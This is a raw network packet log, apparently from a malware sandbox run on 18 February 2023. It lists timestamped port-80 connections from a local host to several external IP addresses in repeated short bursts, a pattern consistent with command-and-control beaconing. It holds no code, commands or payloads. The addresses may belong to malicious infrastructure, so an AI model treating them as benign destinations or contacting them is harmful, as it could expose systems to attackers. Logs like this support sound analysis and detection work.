                                                                                            Feb 18, 2023 13:07:08.354231119 CET4970880192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:08.527575970 CET8049708198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:08.527611017 CET8049708198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:08.527633905 CET8049708198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:08.527654886 CET8049708198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:08.527673006 CET8049708198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:08.527692080 CET8049708198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:08.545717001 CET4970880192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:09.887890100 CET4970880192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:10.954605103 CET4970980192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:11.131784916 CET8049709198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:11.131911039 CET4970980192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:11.131993055 CET4970980192.168.2.3198.54.117.216
                                                                                            Feb 18, 2023 13:07:11.305778980 CET8049709198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:11.305814981 CET8049709198.54.117.216192.168.2.3
                                                                                            Feb 18, 2023 13:07:16.476890087 CET4971080192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:16.494503975 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:16.494609118 CET4971080192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:16.494730949 CET4971080192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:16.512006044 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:17.043140888 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:17.043210030 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:17.043256044 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:17.043262005 CET4971080192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:17.043302059 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:17.043346882 CET4971080192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:17.043346882 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:17.043391943 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:17.043433905 CET4971080192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:17.043437958 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:17.043478012 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:17.043513060 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:17.043517113 CET4971080192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:17.043550968 CET804971066.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:17.043596029 CET4971080192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:18.004128933 CET4971080192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:19.017843962 CET4971180192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:19.035407066 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.035662889 CET4971180192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:19.035922050 CET4971180192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:19.053201914 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.053244114 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.053265095 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.053286076 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.053307056 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.579741955 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.579811096 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.579859018 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.579942942 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.579961061 CET4971180192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:19.579993963 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.580034018 CET4971180192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:19.580044985 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.580092907 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.580133915 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.580158949 CET4971180192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:19.580172062 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.580209017 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.580224991 CET4971180192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:19.597518921 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.597559929 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.597592115 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:19.597623110 CET804971166.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:21.568085909 CET4971280192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:21.585335970 CET804971266.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:21.585460901 CET4971280192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:21.585549116 CET4971280192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:21.602633953 CET804971266.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:22.091809034 CET804971266.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:22.091902971 CET804971266.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:22.092097998 CET4971280192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:22.092205048 CET4971280192.168.2.366.235.200.146
                                                                                            Feb 18, 2023 13:07:22.109208107 CET804971266.235.200.146192.168.2.3
                                                                                            Feb 18, 2023 13:07:27.229461908 CET4971380192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:27.248652935 CET804971391.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:27.248759031 CET4971380192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:27.248894930 CET4971380192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:27.268385887 CET804971391.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:27.268434048 CET804971391.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:27.268500090 CET4971380192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:29.022377968 CET4971380192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:30.052459955 CET4971480192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:30.071891069 CET804971491.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:30.072067976 CET4971480192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:30.077301979 CET4971480192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:30.096512079 CET804971491.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:30.096546888 CET804971491.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:30.096565962 CET804971491.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:30.097371101 CET804971491.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:30.097393990 CET804971491.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:30.097460032 CET4971480192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:31.582673073 CET4971480192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.598654985 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.618015051 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.618267059 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.618267059 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.670150042 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.670228004 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.670274973 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.670320034 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.670391083 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.670435905 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.670475960 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.670517921 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.670540094 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.670541048 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.670541048 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.670566082 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.670613050 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.670617104 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.670675993 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.689589977 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.689668894 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.689752102 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.689800024 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.689845085 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.689860106 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.689889908 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.689925909 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.689938068 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.689944983 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.689981937 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:32.694600105 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.700572968 CET4971580192.168.2.391.195.240.117
                                                                                            Feb 18, 2023 13:07:32.719459057 CET804971591.195.240.117192.168.2.3
                                                                                            Feb 18, 2023 13:07:37.842638969 CET4971680192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:37.957990885 CET8049716208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:37.958133936 CET4971680192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:37.958302975 CET4971680192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:38.073513031 CET8049716208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:38.073813915 CET8049716208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:38.073858976 CET8049716208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:38.073977947 CET4971680192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:39.474915028 CET4971680192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:40.489856958 CET4971780192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:40.605199099 CET8049717208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:40.605629921 CET4971780192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:40.605629921 CET4971780192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:40.720896006 CET8049717208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:40.720948935 CET8049717208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:40.720963001 CET8049717208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:40.721115112 CET8049717208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:40.721133947 CET8049717208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:40.721226931 CET4971780192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:42.114896059 CET4971780192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:43.131889105 CET4971880192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:43.249078035 CET8049718208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:43.249413013 CET4971880192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:43.249524117 CET4971880192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:43.366485119 CET8049718208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:43.366576910 CET8049718208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:43.366614103 CET8049718208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:43.366820097 CET4971880192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:43.367073059 CET4971880192.168.2.3208.100.26.245
                                                                                            Feb 18, 2023 13:07:43.483963966 CET8049718208.100.26.245192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.443712950 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.462059021 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.462215900 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.468291998 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.486634016 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.643560886 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.643656969 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.643717051 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.643784046 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.643793106 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.643838882 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.643842936 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.643898010 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.643946886 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.643954039 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.644009113 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.644054890 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.644063950 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.644119978 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.644165993 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.662487030 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.662554979 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.662576914 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.662594080 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.662712097 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.662744045 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.673161030 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.673199892 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.673218012 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.673424959 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.686666012 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.686738014 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.686984062 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.687947035 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.687972069 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.688064098 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.688505888 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.688524961 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.688566923 CET8049719141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.688592911 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:48.688662052 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:49.974616051 CET4971980192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:50.991059065 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.009862900 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.010027885 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.012238026 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.030905962 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.030942917 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.030966043 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.177112103 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.177150965 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.177176952 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.177201033 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.177206039 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.177228928 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.177254915 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.177256107 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.177283049 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.177294970 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.177309036 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.177341938 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.177349091 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.177367926 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.177407026 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.196116924 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.196158886 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.196198940 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.196230888 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.196233034 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.196260929 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.196284056 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.196326017 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.207675934 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.207714081 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.207884073 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.208435059 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.208461046 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.208570004 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.209268093 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.209287882 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.209332943 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.209363937 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.209369898 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.209384918 CET4972080192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:51.214848042 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.214871883 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.226486921 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.227073908 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.227787018 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:51.227855921 CET8049720141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:53.540688992 CET4972180192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:53.559508085 CET8049721141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:53.559653044 CET4972180192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:53.559796095 CET4972180192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:53.578377962 CET8049721141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:53.677145004 CET8049721141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:53.677171946 CET8049721141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:07:53.677297115 CET4972180192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:53.677462101 CET4972180192.168.2.3141.95.126.89
                                                                                            Feb 18, 2023 13:07:53.695960999 CET8049721141.95.126.89192.168.2.3
                                                                                            Feb 18, 2023 13:08:06.388648987 CET4972280192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:06.416460991 CET804972285.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:06.416713953 CET4972280192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:06.443666935 CET4972280192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:06.471260071 CET804972285.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:06.471977949 CET804972285.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:06.472088099 CET804972285.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:06.472170115 CET4972280192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:07.944910049 CET4972280192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:08.948220015 CET4972380192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:08.975783110 CET804972385.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:08.975974083 CET4972380192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:08.976542950 CET4972380192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:09.004231930 CET804972385.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:09.004260063 CET804972385.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:09.004276991 CET804972385.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:09.005995035 CET804972385.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:09.006022930 CET804972385.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:09.006105900 CET4972380192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:10.523221970 CET4972380192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:11.539556980 CET4972480192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:11.567011118 CET804972485.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:11.567213058 CET4972480192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:11.567351103 CET4972480192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:11.594579935 CET804972485.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:11.598798990 CET804972485.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:11.599050999 CET804972485.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:11.599164009 CET4972480192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:11.599214077 CET4972480192.168.2.385.13.156.177
                                                                                            Feb 18, 2023 13:08:11.626477957 CET804972485.13.156.177192.168.2.3
                                                                                            Feb 18, 2023 13:08:16.797569036 CET4972580192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:16.815129042 CET804972523.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:16.815341949 CET4972580192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:16.815486908 CET4972580192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:16.832648039 CET804972523.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:17.005947113 CET804972523.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:17.006006002 CET804972523.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:17.006046057 CET804972523.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:17.006123066 CET804972523.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:17.006160021 CET804972523.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:17.006190062 CET804972523.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:17.006222963 CET804972523.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:17.006227970 CET4972580192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:17.006227970 CET4972580192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:17.006288052 CET4972580192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:17.006288052 CET4972580192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:18.320826054 CET4972580192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:19.337075949 CET4972680192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:19.354450941 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.357597113 CET4972680192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:19.364682913 CET4972680192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:19.381964922 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.382018089 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.382054090 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.382086992 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.382119894 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.535083055 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.535146952 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.535224915 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.535255909 CET4972680192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:19.535285950 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.535337925 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.535345078 CET4972680192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:19.535384893 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.535425901 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.535433054 CET4972680192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:19.552594900 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.552622080 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:19.552635908 CET804972623.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:21.891747952 CET4972780192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:21.909948111 CET804972723.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:21.910244942 CET4972780192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:21.910377026 CET4972780192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:21.928523064 CET804972723.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:21.949246883 CET804972723.227.38.74192.168.2.3
